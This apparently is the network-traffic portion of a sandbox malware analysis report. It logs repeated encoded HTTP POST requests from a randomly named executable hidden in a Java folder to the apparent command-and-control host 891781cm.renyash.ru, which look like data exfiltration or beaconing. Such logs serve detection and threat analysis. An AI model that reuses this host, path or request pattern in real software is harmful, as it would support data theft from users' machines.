                                                                                                                  Data Ascii: U_X\ZVQ_UZTYQ^UWXY\^YRRS][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ _(\#&%.1*7&'>T-$$&',/->Z?X'=,#^!'^)3
                                                                                                                  Jan 1, 2025 15:02:24.228458881 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:02:24.527369976 CET953INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:02:24 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=67jcCjz5OJ5CsEwHa4quBehfV0DWatObDG%2BRfBzqkdT4JBTkva6UqrLYTJCR5LMY9YoHR68SOfKyrV4%2B7%2BMxGtUK4RdfSMMWlv4iceQAEx5PmfHwLqVq32kNfmUNhX6k8BfLdq86"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30bfd2ac8185d-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1577&min_rtt=1447&rtt_var=804&sent=4&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2140&delivery_rate=585639&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 39 38 0d 0a 03 1e 22 1d 33 3b 3b 5f 3c 00 26 10 2c 01 20 0f 31 3c 36 58 30 30 23 02 31 3e 25 58 39 3b 2b 04 28 3b 0d 13 26 3a 3d 13 37 0f 32 12 25 36 2e 5d 04 1d 26 04 3f 29 36 14 3f 2f 32 00 2a 32 33 04 24 37 28 05 25 42 3c 5c 33 2e 2e 11 22 1c 01 54 25 23 30 1f 28 07 33 59 27 2e 32 1d 34 3a 2e 57 0d 12 21 0e 32 58 3d 1c 3e 1f 38 56 35 02 2f 1c 30 2f 23 1e 24 3f 33 08 34 28 31 0a 3d 11 0a 10 22 0e 39 57 30 04 3c 07 20 3a 22 05 22 09 22 54 20 03 2f 54 05 3d 56 4f 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 98"3;;_<&, 1<6X00#1>%X9;+(;&:=72%6.]&?)6?/2*23$7(%B<\3.."T%#0(3Y'.24:.W!2X=>8V5/0/#$?34(1="9W0< :"""T /T=VO0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  18192.168.2.449759104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:02:23.909970999 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:02:24.259387970 CET1072OUTData Raw: 50 55 58 51 5a 57 51 59 55 5a 54 59 51 52 55 52 58 5d 5c 59 59 50 52 5f 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: PUXQZWQYUZTYQRURX]\YYPR_][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ X(&48-^1>1)X#$419$_'<"&,3_8=8\? W*#^!'^)
                                                                                                                  Jan 1, 2025 15:02:24.355937958 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:02:24.609911919 CET806INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:02:24 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bVHxHgAMmlFmNSirXkeVSn1fwhPx6pWFRO6TYLsNn6QASw8%2BML%2FVeRaEJgpNucZwrLiEjb3vZE%2F4IdMHI5evXyM1bY5kTe3NCm2zX4o5LalwVWHwm7r83cCRJNN9qrYJ4b%2BxuSLv"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30bfdedee0f91-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4436&min_rtt=1642&rtt_var=6203&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=60848&cwnd=217&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  19192.168.2.449760104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:02:24.731966972 CET320OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Jan 1, 2025 15:02:25.087332964 CET1072OUTData Raw: 55 56 5d 56 5f 5d 51 58 55 5a 54 59 51 59 55 50 58 5c 5c 5c 59 50 52 5a 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: UV]V_]QXUZTYQYUPX\\\YPRZ][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ \(,.7.%>=>,$7%:70&V3,Z,=<<((,#^!'^)/
                                                                                                                  Jan 1, 2025 15:02:25.192478895 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:02:25.455626011 CET803INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:02:25 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZikD0I2AgMI6yN653j6dC5OSro1ZNRNTdmFYlPapk6%2FYu3F3beI7fbD7VsO5APltc8yWU0RVJu8RH9ghzy6C6a7%2B3qtwqMOSMtBLIaQdE5AVrsHcLq2pcpXfSIqO2lZZCIml9sAJ"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30c03282b8c4e-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=3502&min_rtt=1937&rtt_var=3858&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1392&delivery_rate=100940&cwnd=204&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  20192.168.2.449761104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:02:25.606446028 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:02:25.962294102 CET1072OUTData Raw: 55 54 58 57 5a 5e 54 5a 55 5a 54 59 51 59 55 57 58 52 5c 59 59 50 52 5e 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: UTXWZ^TZUZTYQYUWXR\YYPR^][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ ]),.!;:$.= 34>T-7 %?='Z'-.$\==4T)<#^!'^)/
                                                                                                                  Jan 1, 2025 15:02:26.083607912 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:02:26.335973978 CET810INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:02:26 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3t7mdrpDpfM%2FDh1g2598TQwJnsftRapUjWZjPuGfPf%2FHQOsIQHwcWCA%2F%2ByDFeDuLoVgHKMQX7OS4AT%2BpPx5dwWnDVDKk%2FcQKO0z9WZ1Pvg1zUacohFmiycCv3rN77tiUnOWKCwQe"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30c08aee041e9-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4336&min_rtt=1669&rtt_var=5960&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=63456&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  21192.168.2.449762104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:02:26.468905926 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:02:26.821665049 CET1072OUTData Raw: 55 56 5d 53 5f 5d 51 55 55 5a 54 59 51 5e 55 53 58 5a 5c 58 59 5c 52 59 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: UV]S_]QUUZTYQ^USXZ\XY\RY][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\#?5#"%>6)+Z$-$^03?#^--8(.*#^!'^)3
                                                                                                                  Jan 1, 2025 15:02:26.923563004 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:02:27.195652008 CET806INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:02:27 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oqcYYKnjRWit4%2BdLN%2BcAeexkur7iY%2BDsDNWkcNLuVPPj0zv8Wwk2ceiLFLv1fH7sN1CXcIT6PnwfPDScZNESPhaHjI9V2qnsSmX4AEeUM5ddUpIAthVwxqmaQPNpQUEU8%2BjEHQM7"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30c0dffcb41c6-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4666&min_rtt=2546&rtt_var=5196&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=74829&cwnd=203&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  22192.168.2.449763104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:02:27.348082066 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:02:27.696805954 CET1072OUTData Raw: 50 53 58 51 5a 57 54 5f 55 5a 54 59 51 5a 55 52 58 5f 5c 5a 59 50 52 53 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: PSXQZWT_UZTYQZURX_\ZYPRS][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ ])?-Y#(9^1>!\>=<$'-9'8$Y-',$/(?3*<#^!'^)#
                                                                                                                  Jan 1, 2025 15:02:27.806298971 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:02:28.072681904 CET804INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:02:28 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zVdarj2BmM9S1O6GoINJMceljo8ruEh1Eg1EUyUOxjTy8InD%2F2be6Tjsb72sCh3oN58SF8FXrA0PCjEHGwBxeFs8vnUpkhXqBSYxPv%2BELJhQXnH%2FGcKjDfd62HPnObMoklBreC2E"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30c137b740f4a-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4730&min_rtt=1599&rtt_var=6862&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=54782&cwnd=167&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  23192.168.2.449764104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:02:28.200762033 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:02:28.556112051 CET1072OUTData Raw: 50 56 58 50 5a 5f 51 54 55 5a 54 59 51 5c 55 51 58 59 5c 5a 59 51 52 5e 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: PVXPZ_QTUZTYQ\UQXY\ZYQR^][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ ^),>7;%%-!)=?_0:B$\3$(/4=>><#^!'^)
                                                                                                                  Jan 1, 2025 15:02:28.643827915 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:02:28.899789095 CET803INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:02:28 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=y3CZAKEvr6TEpMobXn4AH47y2NkMN8k0S8JG3Jtl62t8Qd7bUSLSPvIebIwnhKmnc91as1q70vVVcl8UeLlg%2Fkowvmd43d2277MOymW%2BvBOAWL2yOH9r9IgjIGwRym2XfKEG3fiL"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30c18bc2ac3f8-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1977&min_rtt=1468&rtt_var=1569&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=263442&cwnd=159&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  24192.168.2.449765104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:02:29.040119886 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:02:29.384826899 CET1072OUTData Raw: 50 56 58 52 5a 5c 54 5a 55 5a 54 59 51 5e 55 56 58 52 5c 5a 59 57 52 58 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: PVXRZ\TZUZTYQ^UVXR\ZYWRX][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ ^(?>4+-&>Z>X<$$=943!$+Y8.+7=,#^!'^)3
                                                                                                                  Jan 1, 2025 15:02:29.486393929 CET25INHTTP/1.1 100 Continue


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  25192.168.2.449766104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:02:29.546731949 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1784
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:02:29.901791096 CET1784OUTData Raw: 55 55 5d 54 5a 5d 54 5a 55 5a 54 59 51 5b 55 57 58 53 5c 5e 59 50 52 58 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: UU]TZ]TZUZTYQ[UWXS\^YPRX][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\#??)#226(=<'4.'?.P',+^/\=>>#^!'^)/
                                                                                                                  Jan 1, 2025 15:02:29.988141060 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:02:30.290890932 CET962INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:02:30 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p%2BcaFjo%2FLBqAmVndaFjGwv8v%2BSPdwWwCJmmx%2FkMFifQfJdXuJdOE501KIR%2BeRrSF%2BSSuRYlPLte1Fa88%2F05etIZtoU199pJKIRg07PdYpjGerZyYJZDE9UQXfT4pMPn5e13Ednwd"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30c212ce8426d-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2596&min_rtt=2010&rtt_var=1927&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2128&delivery_rate=217812&cwnd=226&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 39 38 0d 0a 03 1e 21 08 30 38 28 01 28 58 2a 1e 2f 2c 34 0f 31 2f 08 59 27 1e 30 13 32 3e 18 07 2f 2b 30 11 28 15 0d 5b 32 14 3d 5e 34 31 0f 04 26 36 2e 5d 04 1d 26 04 3d 2a 36 5e 3f 3c 26 02 2a 1c 24 5e 33 09 2b 5a 24 37 30 11 27 3e 25 02 22 1c 3f 1f 27 30 20 57 3c 3a 23 12 24 04 32 57 34 2a 2e 57 0d 12 22 1d 25 00 39 1f 29 08 3f 0a 21 5a 38 0b 25 2f 2b 56 27 12 3b 09 34 3b 35 0a 29 11 2c 59 35 19 0f 55 30 39 3c 01 21 00 31 59 21 09 22 54 20 03 2f 54 05 3d 56 4f 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 98!08((X*/,41/Y'02>/+0([2=^41&6.]&=*6^?<&*$^3+Z$70'>%"?'0 W<:#$2W4*.W"%9)?!Z8%/+V';4;5),Y5U09<!1Y!"T /T=VO0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  26192.168.2.449767104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:02:29.669495106 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
